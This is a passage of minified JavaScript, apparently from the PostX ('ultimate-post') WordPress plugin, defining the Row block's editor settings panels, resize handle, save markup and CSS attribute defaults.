active":""),onClick:()=>{l({layout:e});const{innerBlocks:t}=f(L)[0]||[];t.length>e.lg.length&&Array(t.length-e.lg.length).fill(1).forEach(((l,o)=>{t[t.length-(o+1)].innerBlocks.forEach(((l,o)=>{const a=v(f(l.clientId));x(h(a),0,t[e.lg.length-1].clientId,!1)})),k(t[t.length-(o+1)].clientId,!1)}));for(let l=0;l<e.lg.length;l++){const o={lg:e.lg[l],sm:e.sm[l],xs:e.xs[l],unit:"%"};if(t.length>=l+1)w(t[l].clientId,{columnWidth:o});else{const e=wp.blocks.createBlock("ultimate-post/column",{columnWidth:o});x(e,l,L,!1)}}}},t+1))))),(0,a.createElement)("br",null),(0,a.createElement)(c.Z,{clientId:L,layout:R,store:G})),(0,a.createElement)(s.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,a.createElement)(i.T,{title:__("General","ultimate-post"),include:[{position:1,data:{type:"text",key:"advanceId",label:__("ID","ultimate-post")}},{position:2,data:{type:"range",key:"advanceZindex",min:-100,max:1e4,step:1,label:__("z-index","ultimate-post")}},{position:3,data:{type:"select",key:"contentHeightType",label:__("Height Type","ultimate-post"),options:[{value:"normal",label:__("Normal","ultimate-post")},{value:"windowHeight",label:__("Window Height","ultimate-post")},{value:"custom",label:__("Min Height","ultimate-post")}]}},{position:4,data:{type:"range",key:"contentHeight",min:0,max:1500,step:1,responsive:!0,unit:!0,label:__("Min Height","ultimate-post")}},{position:5,data:{type:"group",key:"contentOverflow",justify:!0,label:__("Overflow","ultimate-post"),options:[{value:"visible",label:__("Visible","ultimate-post")},{value:"hidden",label:__("Hidden","ultimate-post")}]}},{position:6,data:{type:"select",key:"HtmlTag",block:"column",beside:!0,label:__("Html Tag","ultimate-post"),options:[{value:"div",label:__("div","ultimate-post")},{value:"section",label:__("Section","ultimate-post")},{value:"header",label:__("header","ultimate-post")},{value:"footer",label:__("footer","ultimate-post")},{value:"aside",label:__("aside","ultimate-post")},{value:"main",label:__("main","ultimate-post")},{value:"article",label:__("article","ultimate-post")}]}},{position:7,data:{type:"toggle",key:"enableRowLink",label:__("Enable Wrapper Link","ultimate-post")}},{position:8,data:{type:"text",key:"rowWrapperLink",label:__("Wrapper Link","ultimate-post")}},{position:9,data:{type:"toggle",key:"enableNewTab",label:__("Enable Target Blank","ultimate-post")}}],initialOpen:!0,store:G}),(0,a.createElement)(i.Mg,{store:G}),(0,a.createElement)(i.iv,{store:G}))),(0,i.dH)()),(0,a.createElement)(H,(0,o.Z)({},A&&{id:A},{className:`ultp-block-${U} ${I} ${W?`align${W}`:""} ${J}`}),$&&(0,a.createElement)("style",{dangerouslySetInnerHTML:{__html:$}}),(0,a.createElement)("div",{className:"ultp-row-wrapper"},(0,a.createElement)(p.t,{position:"top",setLengthFunc:Y,unit:K,previousLength:parseInt(F[q]?.top?F[q]?.top:0),toggleSelection:B}),Object.keys(Z).length>0&&1==Z.openColor&&"video"==Z.type&&Z.video&&(0,i.$i)(Z.video,Z.loop||0,Z.start||"",Z.end||"",Z.fallback||""),j&&"empty"!=j&&(0,a.createElement)("div",{className:"ultp-row-shape ultp-shape-top"},(0,u.T)(j,U,"top",D)),1==O.openColor&&(0,a.createElement)("div",{className:"ultp-row-overlay"}),N&&"empty"!=N&&(0,a.createElement)("div",{className:"ultp-row-shape ultp-shape-bottom"},(0,u.T)(N,U,"bottom",z)),(0,a.createElement)(m,{renderAppender:!1,template:(e=>e.lg.map(((t,l)=>["ultimate-post/column",{columnWidth:{lg:e.lg[l],sm:e.sm[l],xs:e.xs[l],unit:"%"}}])))(R),allowedBlocks:["ultimate-post/column"]}),(0,a.createElement)(p.t,{position:"bottom",setLengthFunc:Y,unit:K,previousLength:parseInt(F[q]?.bottom?F[q]?.bottom:0),toggleSelection:B}))))}},55040:(e,t,l)=>{"use strict";l.d(t,{t:()=>n});var o=l(67294);const{ResizableBox:a}=wp.components,{useState:i}=wp.element,n=e=>{const{position:t,setLengthFunc:l,unit:n,previousLength:r,toggleSelection:s,minHeight:p,maxHeight:c,minWidth:u,maxWidth:d,currentColumnParentWidth:m,stateHandle:g}=e,[y,b]=i(r),[v,h]=i(!1);return(0,o.createElement)(a,{size:{height:"right"==t?"100%":r+n,width:"right"==t?r+n:"auto"},minHeight:0,minWidth:u?u+n:"0%",maxWidth:d?d+n:"100%",enable:{[t]:!0},onResize:(e,l,o,a)=>{e.preventDefault(),h(!0),b(r+a.height),g&&g(r,"right"==t?a.width:a.height,t),s(!0)},onResizeStop:(e,o,a,i)=>{l(r,"right"==t?i.width:i.height,t),s(!0),h(!1)},onResizeStart:()=>{s(!1)}},y&&["top","bottom"].includes(t)?(0,o.createElement)("div",{className:`ultp-dragable-padding ultp-dragable-padding-${t}`},(0,o.createElement)("span",null,(v?y:r)+n)):"")}},64626:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(87462),a=l(67294),i=l(53049),n=l(20498);const{InnerBlocks:r}=wp.blockEditor;function s(e){const{blockId:t,advanceId:l,HtmlTag:s,rowTopShape:p,rowBtmShape:c,enableRowLink:u,rowWrapperLink:d,enableNewTab:m,rowBgImg:g,rowOverlayBgImg:y,rowTopGradientColor:b,rowBtmGradientColor:v,align:h,rowWrapPadding:f,rowStickyPosition:k}=e.attributes,w=g?.openColor?" ultpBgPadding"+(f?.lg?.left?"":" lgL")+(f?.lg?.right?"":" lgR")+(f?.sm?.left?"":" smL")+(f?.sm?.right?"":" smR")+(f?.xs?.left?"":" xsL")+(f?.xs?.right?"":" xsR"):"";let x="";return["row_sticky","row_scrollToStickyTop"].includes(k)&&(x=` row_sticky_active ${k}`),(0,a.createElement)(s,(0,o.Z)({},l&&{id:l},{className:`ultp-block-${t} ${h?`align${h}`:""} ${w}${x}`}),(0,a.createElement)("div",{className:"ultp-row-wrapper"},Object.keys(g).length>0&&1==g.openColor&&"video"==g.type&&g.video&&(0,i.$i)(g.video,g.loop||0,g.start||"",g.end||"",g.fallback||""),p&&"empty"!=p&&(0,a.createElement)("div",{className:"ultp-row-shape ultp-shape-top"},(0,n.T)(p,t,"top",b)),1==y.openColor&&(0,a.createElement)("div",{className:"ultp-row-overlay"}),u&&(0,a.createElement)("a",{href:d,target:m&&"_blank",className:"ultp-rowwrap-url"}),c&&"empty"!=c&&(0,a.createElement)("div",{className:"ultp-row-shape ultp-shape-bottom"},(0,n.T)(c,t,"bottom",v)),(0,a.createElement)("div",{className:"ultp-row-content"},(0,a.createElement)(r.Content,null))))}},74661:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(20498);const{__}=wp.i18n,n=({store:e,clientId:t,layout:l})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"rowlayout",block:"column",key:"layout",responsive:!0,clientId:t,layout:l,label:__("Layout","ultimate-post")}},{position:3,data:{type:"range",key:"columnGap",min:0,max:300,step:1,responsive:!0,clientId:t,updateChild:!0,label:__("Column Gap (Custom)","ultimate-post")}},{position:4,data:{type:"range",key:"rowGap",min:0,max:300,step:1,responsive:!0,label:__("Row Gap","ultimate-post")}},{position:5,data:{type:"toggle",key:"inheritThemeWidth",clientId:t,updateChild:!0,label:__("Inherit Theme Width","ultimate-post")}},{position:6,data:{type:"range",key:"rowContentWidth",min:0,max:1700,step:1,responsive:!0,unit:!0,clientId:t,updateChild:!0,label:__("Content Max-Width","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Flex Properties","ultimate-post"),include:[{position:3,data:{type:"toggle",key:"reverseEle",label:__("Reverse","ultimate-post")}},{position:5,data:{type:"alignment",block:"row-column",key:"ColumnAlign",disableJustify:!0,icons:["algnStart","algnCenter","algnEnd","stretch"],options:["flex-start","center","flex-end","stretch"],label:__("Vertical Alignment (Align Items)","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Background & Wrapper","ultimate-post"),include:[{position:1,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"rowBgImg",image:!0,video:!0,label:__("Background","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"rowWrapHoverImg",image:!0,label:__("Background","ultimate-post")}]}]}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Background Overlay","ultimate-post"),include:[{position:1,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"rowOverlayBgImg",image:!0,label:__("Color","ultimate-post")},{type:"range",key:"rowOverlayOpacity",min:0,max:100,step:1,responsive:!1,unit:!1,label:__("Opacity","ultimate-post")},{type:"filter",key:"rowOverlayBgFilter",label:__("CSS Filter","ultimate-post")},{type:"select",key:"rowOverlayBgBlend",beside:!0,options:[{value:"",label:__("Select","ultimate-post")},{value:"normal",label:__("Normal","ultimate-post")},{value:"multiply",label:__("Multiply","ultimate-post")},{value:"screen",label:__("Screen","ultimate-post")},{value:"overlay",label:__("Overlay","ultimate-post")},{value:"darken",label:__("Darken","ultimate-post")},{value:"lighten",label:__("Lighten","ultimate-post")},{value:"color-dodge",label:__("Color Dodge","ultimate-post")},{value:"color-burn",label:__("Color Burn","ultimate-post")},{value:"hard-light",label:__("Hard Light","ultimate-post")},{value:"soft-light",label:__("Soft Light","ultimate-post")},{value:"difference",label:__("Difference","ultimate-post")},{value:"exclusion",label:__("Exclusion","ultimate-post")},{value:"hue",label:__("Hue","ultimate-post")},{value:"saturation",label:__("Saturation","ultimate-post")},{value:"luminosity",label:__("Luminosity","ultimate-post")},{value:"color",label:__("Color","ultimate-post")}],help:"Notice: Background Color Requierd",label:__("Blend Mode","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"rowOverlaypHoverImg",image:!0,label:__("Color","ultimate-post")},{type:"range",key:"rowOverlayHovOpacity",min:0,max:100,step:1,responsive:!1,unit:!1,label:__("Opacity","ultimate-post")},{type:"filter",key:"rowOverlayHoverFilter",label:__("CSS Filter","ultimate-post")},{type:"select",key:"rowOverlayHoverBgBlend",beside:!0,options:[{value:"",label:__("Select","ultimate-post")},{value:"normal",label:__("Normal","ultimate-post")},{value:"multiply",label:__("Multiply","ultimate-post")},{value:"screen",label:__("Screen","ultimate-post")},{value:"overlay",label:__("Overlay","ultimate-post")},{value:"darken",label:__("Darken","ultimate-post")},{value:"lighten",label:__("Lighten","ultimate-post")},{value:"color-dodge",label:__("Color Dodge","ultimate-post")},{value:"color-burn",label:__("Color Burn","ultimate-post")},{value:"hard-light",label:__("Hard Light","ultimate-post")},{value:"soft-light",label:__("Soft Light","ultimate-post")},{value:"difference",label:__("Difference","ultimate-post")},{value:"exclusion",label:__("Exclusion","ultimate-post")},{value:"hue",label:__("Hue","ultimate-post")},{value:"saturation",label:__("Saturation","ultimate-post")},{value:"luminosity",label:__("Luminosity","ultimate-post")},{value:"color",label:__("Color","ultimate-post")}],help:"Notice: Background Color Requierd",label:__("Blend Mode","ultimate-post")}]}]}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Spacing & Border Style","ultimate-post"),include:[{position:1,data:{type:"dimension",key:"rowWrapMargin",step:1,unit:!0,responsive:!0,label:__("Margin","ultimate-post")}},{position:2,data:{type:"dimension",key:"rowWrapPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:3,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"border",key:"rowWrapBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"rowWrapRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"rowWrapShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"border",key:"rowWrapHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"rowWrapHoverRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"rowWrapHoverShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]}]}}],store:e}),(0,o.createElement)(a.T,{title:__("Shape Divider","ultimate-post"),include:[{position:1,data:{type:"tab",content:[{name:"Top",title:__("Top","ultimate-post"),options:[{type:"select",key:"rowTopShape",label:__("Type","ultimate-post"),svg:!0,options:[{value:"empty",label:__("Empty","ultimate-post")},{value:"tilt",label:__("Tilt","ultimate-post"),svg:(0,i.T)("tilt")},{value:"mountain",label:__("Mountain","ultimate-post"),svg:(0,i.T)("mountain")},{value:"waves",label:__("Waves","ultimate-post"),svg:(0,i.T)("waves")},{value:"curve",label:__("Curve","ultimate-post"),svg:(0,i.T)("curve")},{value:"curve_invert",label:__("Curve Invert","ultimate-post"),svg:(0,i.T)("curve_invert")},{value:"asymmetrical_triangle",label:__("Asymmetrical Tringle","ultimate-post"),svg:(0,i.T)("asymmetrical_triangle")},{value:"asymmetrical_triangle_invert",label:__("Asymmetrical Tringle Invert","ultimate-post"),svg:(0,i.T)("asymmetrical_triangle_invert")},{value:"waves_invert",label:__("Waves Invert","ultimate-post"),svg:(0,i.T)("waves_invert")}]},{type:"color2",key:"rowTopGradientColor",label:__("Color","ultimate-post"),extraClass:"ultp-hide-field-item",customGradient:[{name:"Plum Plate",gradient:"linear-gradient(113deg, rgb(102, 126, 234) 0%, rgb(118, 75, 162) 100%)",slug:"plum-plate"},{name:"Aqua Splash",gradient:"linear-gradient(15deg, rgb(19, 84, 122) 0%, rgb(128, 208, 199) 100%)",slug:"aqua-splash"},{name:"Teen Party",gradient:"linear-gradient(-225deg, rgb(255, 5, 124) 0%, rgb(141, 11, 147) 50%, rgb(50, 21, 117) 100%)",slug:"teen-party"},{name:"Fabled Sunset",gradient:"linear-gradient(-270deg, rgb(35, 21, 87) 0%, rgb(68, 16, 122) 29%, rgb(255, 19, 97) 67%, rgb(255, 248, 0) 100%)",slug:"fabled-sunset"},{name:"Night Call",gradient:"linear-gradient(-245deg, rgb(172, 50, 228) 0%, rgb(121, 24, 242) 48%, rgb(72, 1, 255) 100%)",slug:"night-call"},{name:"Itmeo Branding",gradient:"linear-gradient(18deg, rgb(42, 245, 152) 0%, rgb(0, 158, 253) 100%)",slug:"itmeo-branding"},{name:"Morning Salad",gradient:"linear-gradient(-255deg, rgb(183, 248, 219) 0%, rgb(80, 167, 194) 100%)",slug:"morning-salad"},{name:"Mind Crawl",gradient:"linear-gradient(-245deg, rgb(71, 59, 123) 0%, rgb(53, 132, 167) 51%, rgb(48, 210, 190) 100%)",slug:"mind-crawl"},{name:"Angel Care",gradient:"linear-gradient(-245deg, rgb(255, 226, 159) 0%, rgb(255, 169, 159) 48%, rgb(255, 113, 154) 100%)",slug:"angel-care"},{name:"Deep Blue",gradient:"linear-gradient(90deg, rgb(106, 17, 203) 0%, rgb(37, 117, 252) 100%)",slug:"deep-blue"},{name:"Mole Hall",gradient:"linear-gradient(-290deg, rgb(97, 97, 97) 0%, rgb(155, 197, 195) 100%)",slug:"mole-hall"},{name:"Over Sun",gradient:"linear-gradient(60deg, rgb(171, 236, 214) 0%, rgb(251, 237, 150) 100%)",slug:"over-sun"},{name:"Clean Mirror",gradient:"linear-gradient(45deg, rgb(147, 165, 207) 0%, rgb(228, 239, 233) 100%)",slug:"clean-mirror"},{name:"Strong Bliss",gradient:"linear-gradient(90deg, rgb(247, 140, 160) 0%, rgb(249, 116, 143) 19%, rgb(253, 134, 140) 60%, rgb(254, 154, 139) 100%)",slug:"strong-bliss"},{name:"Sweet Period",gradient:"linear-gradient(0deg, rgb(63, 81, 177) 0%, rgb(90, 85, 174) 13%, rgb(123, 95, 172) 25%, rgb(143, 106, 174) 38%, rgb(168, 106, 164) 50%)",slug:"sweet-period"},{name:"Purple Division",gradient:"linear-gradient(0deg, rgb(112, 40, 228) 0%, rgb(229, 178, 202) 100%)",slug:"purple-division"},{name:"Cold Evening",gradient:"linear-gradient(0deg, rgb(12, 52, 131) 0%, rgb(162, 182, 223) 100%, rgb(107, 140, 206) 100%, rgb(162, 182, 223) 100%)",slug:"cold-evening"},{name:"Desert Hump",gradient:"linear-gradient(0deg, rgb(199, 144, 129) 0%, rgb(223, 165, 121) 100%)",slug:"desert-hump"},{name:"Eternal Constance",gradient:"linear-gradient(0deg, rgb(9, 32, 63) 0%, rgb(83, 120, 149) 100%)",slug:"ethernal-constance"},{name:"Juicy Cake",gradient:"linear-gradient(0deg, rgb(225, 79, 173) 0%, rgb(249, 212, 35) 100%)",slug:"juicy-cake"},{name:"Rich Metal",gradient:"linear-gradient(90deg, rgb(215, 210, 204) 0%, rgb(48, 67, 82) 100%)",slug:"rich-metal"}]},{type:"range",key:"rowTopShapeWidth",min:100,max:300,step:1,responsive:!0,label:__("Width","ultimate-post")},{type:"range",key:"rowTopShapeHeight",min:0,max:500,step:1,responsive:!0,label:__("Height","ultimate-post")},{type:"toggle",key:"rowTopShapeFlip",label:__("Flip","ultimate-post")},{type:"toggle",key:"rowTopShapeFront",label:__("Bring to Front","ultimate-post")},{type:"range",key:"rowTopShapeOffset",min:-100,max:100,step:1,responsive:!0,label:__("Offset","ultimate-post")}]},{name:"Bottom",title:__("Bottom","ultimate-post"),options:[{type:"select",key:"rowBtmShape",label:__("Type","ultimate-post"),svgClass:"btmShapeIcon",svg:!0,options:[{value:"empty",label:__("Empty","ultimate-post")},{value:"tilt",label:__("Tilt","ultimate-post"),svg:(0,i.T)("tilt")},{value:"mountain",label:__("Mountain","ultimate-post"),svg:(0,i.T)("mountain")},{value:"waves",label:__("Waves","ultimate-post"),svg:(0,i.T)("waves")},{value:"curve",label:__("Curve","ultimate-post"),svg:(0,i.T)("curve")},{value:"curve_invert",label:__("Curve Invert","ultimate-post"),svg:(0,i.T)("curve_invert")},{value:"asymmetrical_triangle",label:__("Asymmetrical Tringle","ultimate-post"),svg:(0,i.T)("asymmetrical_triangle")},{value:"asymmetrical_triangle_invert",label:__("Asymmetrical Tringle Invert","ultimate-post"),svg:(0,i.T)("asymmetrical_triangle_invert")},{value:"waves_invert",label:__("Waves Invert","ultimate-post"),svg:(0,i.T)("waves_invert")}]},{type:"color2",key:"rowBtmGradientColor",label:__("Color","ultimate-post"),extraClass:"ultp-hide-field-item",customGradient:[{name:"Plum Plate",gradient:"linear-gradient(113deg, rgb(102, 126, 234) 0%, rgb(118, 75, 162) 100%)",slug:"plum-plate"},{name:"Aqua Splash",gradient:"linear-gradient(15deg, rgb(19, 84, 122) 0%, rgb(128, 208, 199) 100%)",slug:"aqua-splash"},{name:"Teen Party",gradient:"linear-gradient(-225deg, rgb(255, 5, 124) 0%, rgb(141, 11, 147) 50%, rgb(50, 21, 117) 100%)",slug:"teen-party"},{name:"Fabled Sunset",gradient:"linear-gradient(-270deg, rgb(35, 21, 87) 0%, rgb(68, 16, 122) 29%, rgb(255, 19, 97) 67%, rgb(255, 248, 0) 100%)",slug:"fabled-sunset"},{name:"Night Call",gradient:"linear-gradient(-245deg, rgb(172, 50, 228) 0%, rgb(121, 24, 242) 48%, rgb(72, 1, 255) 100%)",slug:"night-call"},{name:"Itmeo Branding",gradient:"linear-gradient(18deg, rgb(42, 245, 152) 0%, rgb(0, 158, 253) 100%)",slug:"itmeo-branding"},{name:"Morning Salad",gradient:"linear-gradient(-255deg, rgb(183, 248, 219) 0%, rgb(80, 167, 194) 100%)",slug:"morning-salad"},{name:"Mind Crawl",gradient:"linear-gradient(-245deg, rgb(71, 59, 123) 0%, rgb(53, 132, 167) 51%, rgb(48, 210, 190) 100%)",slug:"mind-crawl"},{name:"Angel Care",gradient:"linear-gradient(-245deg, rgb(255, 226, 159) 0%, rgb(255, 169, 159) 48%, rgb(255, 113, 154) 100%)",slug:"angel-care"},{name:"Deep Blue",gradient:"linear-gradient(90deg, rgb(106, 17, 203) 0%, rgb(37, 117, 252) 100%)",slug:"deep-blue"},{name:"Mole Hall",gradient:"linear-gradient(-290deg, rgb(97, 97, 97) 0%, rgb(155, 197, 195) 100%)",slug:"mole-hall"},{name:"Over Sun",gradient:"linear-gradient(60deg, rgb(171, 236, 214) 0%, rgb(251, 237, 150) 100%)",slug:"over-sun"},{name:"Clean Mirror",gradient:"linear-gradient(45deg, rgb(147, 165, 207) 0%, rgb(228, 239, 233) 100%)",slug:"clean-mirror"},{name:"Strong Bliss",gradient:"linear-gradient(90deg, rgb(247, 140, 160) 0%, rgb(249, 116, 143) 19%, rgb(253, 134, 140) 60%, rgb(254, 154, 139) 100%)",slug:"strong-bliss"},{name:"Sweet Period",gradient:"linear-gradient(0deg, rgb(63, 81, 177) 0%, rgb(90, 85, 174) 13%, rgb(123, 95, 172) 25%, rgb(143, 106, 174) 38%, rgb(168, 106, 164) 50%)",slug:"sweet-period"},{name:"Purple Division",gradient:"linear-gradient(0deg, rgb(112, 40, 228) 0%, rgb(229, 178, 202) 100%)",slug:"purple-division"},{name:"Cold Evening",gradient:"linear-gradient(0deg, rgb(12, 52, 131) 0%, rgb(162, 182, 223) 100%, rgb(107, 140, 206) 100%, rgb(162, 182, 223) 100%)",slug:"cold-evening"},{name:"Desert Hump",gradient:"linear-gradient(0deg, rgb(199, 144, 129) 0%, rgb(223, 165, 121) 100%)",slug:"desert-hump"},{name:"Eternal Constance",gradient:"linear-gradient(0deg, rgb(9, 32, 63) 0%, rgb(83, 120, 149) 100%)",slug:"ethernal-constance"},{name:"Juicy Cake",gradient:"linear-gradient(0deg, rgb(225, 79, 173) 0%, rgb(249, 212, 35) 100%)",slug:"juicy-cake"},{name:"Rich Metal",gradient:"linear-gradient(90deg, rgb(215, 210, 204) 0%, rgb(48, 67, 82) 100%)",slug:"rich-metal"}]},{type:"range",key:"rowBtmShapeWidth",min:100,max:300,step:1,responsive:!0,label:__("Width","ultimate-post")},{type:"range",key:"rowBtmShapeHeight",min:0,max:500,step:1,responsive:!0,label:__("Height","ultimate-post")},{type:"toggle",key:"rowBtmShapeFlip",label:__("Flip","ultimate-post")},{type:"toggle",key:"rowBtmShapeFront",label:__("Bring to Front","ultimate-post")},{type:"range",key:"rowBtmShapeOffset",min:-100,max:100,step:1,responsive:!0,label:__("Offset","ultimate-post")}]}]}}],store:e}),(0,o.createElement)(a.T,{title:__("Row Color","ultimate-post"),include:[{position:1,data:{type:"color",key:"rowColor",label:__("Color","ultimate-post")}},{position:2,data:{type:"color",key:"rowLinkColor",label:__("Link Color","ultimate-post")}},{position:3,data:{type:"color",key:"rowLinkHover",label:__("Link Hover Color","ultimate-post")}},{position:4,data:{type:"typography",key:"rowTypo",label:__("Typography","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{doc:"https://wpxpo.com/docs/postx/postx-features/row-column/#making-row-sticky",title:__("Row Sticky","ultimate-post"),include:[{position:1,data:{type:"select",key:"rowStickyPosition",options:[{value:"",label:__("Normal","ultimate-post")},{value:"row_sticky",label:__("Sticky","ultimate-post")},{value:"row_scrollToStickyTop",label:__("Fixed ( on Top Scroll )","ultimate-post")}],label:__("Choose Behavior","ultimate-post")}},{position:2,data:{type:"toggle",key:"rowDisableSticky",label:__("Disable Sticky ( on Breakpoint )","ultimate-post")}},{position:3,data:{type:"range",key:"disableStickyRanges",min:0,max:1200,step:1,label:__("Breakpoint ( px )","ultimate-post")}}],store:e}))},40358:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"object",default:{}},columnGap:{type:"object",default:{lg:"20",sm:"10",xs:"5"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { column-gap: {{columnGap}}px;}"}]},rowGap:{type:"object",default:{lg:"20"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n            {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { row-gap: {{rowGap}}px }"}]},inheritThemeWidth:{type:"boolean",default:!1},rowContentWidth:{type:"object",default:{lg:"1140",ulg:"px"},style:[{depends:[{key:"inheritThemeWidth",condition:"==",value:!1}],selector:" {{ULTP}} > .ultp-row-wrapper  > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { max-width: {{rowContentWidth}}; margin-left: auto !important; margin-right: auto !important;}"}]},contentHeightType:{type:"string",default:"normal",style:[{depends:[{key:"contentHeightType",condition:"==",value:"custom"}]},{depends:[{key:"contentHeightType",condition:"==",value:"normal"}]},{depends:[{key:"contentHeightType",condition:"==",value:"windowHeight"}],selector:"{{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { height: 100vh; }"}]},contentHeight:{type:"object",default:{lg:"100",ulg:"px"},style:[{depends:[{key:"contentHeightType",condition:"==",value:"custom"}],selector:"{{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { min-height: {{contentHeight}} }"}]},contentOverflow:{type:"string",default:"visible",style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout,  \n            {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { overflow: {{contentOverflow}} }"}]},HtmlTag:{type:"string",default:"div"},enableRowLink:{type:"boolean",default:!1},rowWrapperLink:{type:"string",default:"",style:[{depends:[{key:"enableRowLink",condition:"==",value:!0}]}]},enableNewTab:{type:"boolean",default:!1,style:[{depends:[{key:"enableRowLink",condition:"==",value:!0}]}]},reverseEle:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n            {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { flex-direction: row; }"},{depends:[{key:"reverseEle",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n            {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { flex-direction: row-reverse; }"}]},ColumnAlign:{type:"string",default:"",style:[{depends:[{key:"ColumnAlign",condition:"==",value:"stretch"}],selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-row-content > .wp-block-ultimate-post-column { height: auto } \n                {{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout > .wp-block > .wp-block-ultimate-post-column, \n                {{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout > .wp-block > .wp-block-ultimate-post-column > .ultp-column-wrapper { height: 100%; box-sizing: border-box;}"},{depends:[{key:"ColumnAlign",condition:"!=",value:"stretch"}]},{selector:"{{ULTP}} > .ultp-row-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                {{ULTP}} > .ultp-row-wrapper > .ultp-row-content { align-items: {{ColumnAlign}} } "}]},rowBgImg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat",loop:!0},style:[{selector:"{{ULTP}} > .ultp-row-wrapper"}]},rowWrapHoverImg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper:hover"}]},rowOverlayBgImg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-row-overlay"}]},rowOverlayOpacity:{type:"string",default:"50",style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-row-overlay { opacity:{{rowOverlayOpacity}}%; }"}]},rowOverlayBgFilter:{type:"object",default:{openFilter:0,hue:0,saturation:100,brightness:100,contrast:100,invert:0,blur:0},style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-row-overlay { {{rowOverlayBgFilter}} }"}]},rowOverlayBgBlend:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-row-wrapper > .ultp-row-overlay { mix-blend-mode:{{rowOverlayBgBlend}}; }"}]},rowOverlaypHoverImg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} > .ultp-row-wrapper:hover > .ultp-row-overlay"}]},rowOverlayHovOpacity:{type:"string",default:"50",style:[{selector:"{{ULTP}} > .ultp-row-wrapper:hover > .ultp-row-overlay { opacity:{{rowOverlayHovOpacity}}% }"}]},rowOverlayHoverFilter:{type:"object",default:{openFilter:0,hue:0,saturation:100,brightness:100,contrast:100,invert:0,blur:0},style:[{selector:"{{ULTP}} > .ultp-row-wrapper:hover > .ultp-row-overlay { {{rowOverlayHoverFilter}} }"}]},rowOverlayHoverBgBlend:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-row-wrapper:hover > .ultp-row-overlay { mix-blend-mode:{{rowOverlayHoverBgBlend}}; }"}]},rowWrapMargin:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-row-wrapper { margin:{{rowWrapMargin}}; }"}]},rowWrapPadding:{type:"object",default:{lg:{top:"15",bottom:"15",unit:"px"}},style:[{selector:"{{ULTP}}.wp-block-ultimate-post-row > .ultp-row-wrapper:not(:has( > .components-resizable-box__container)), \n            {{ULTP}}.wp-block-ultimate-post-row > .ultp-row-wrapper:has( > .components-resizable-box__container) > .block-editor-inner-blocks {padding: {{rowWrapPadding}}; 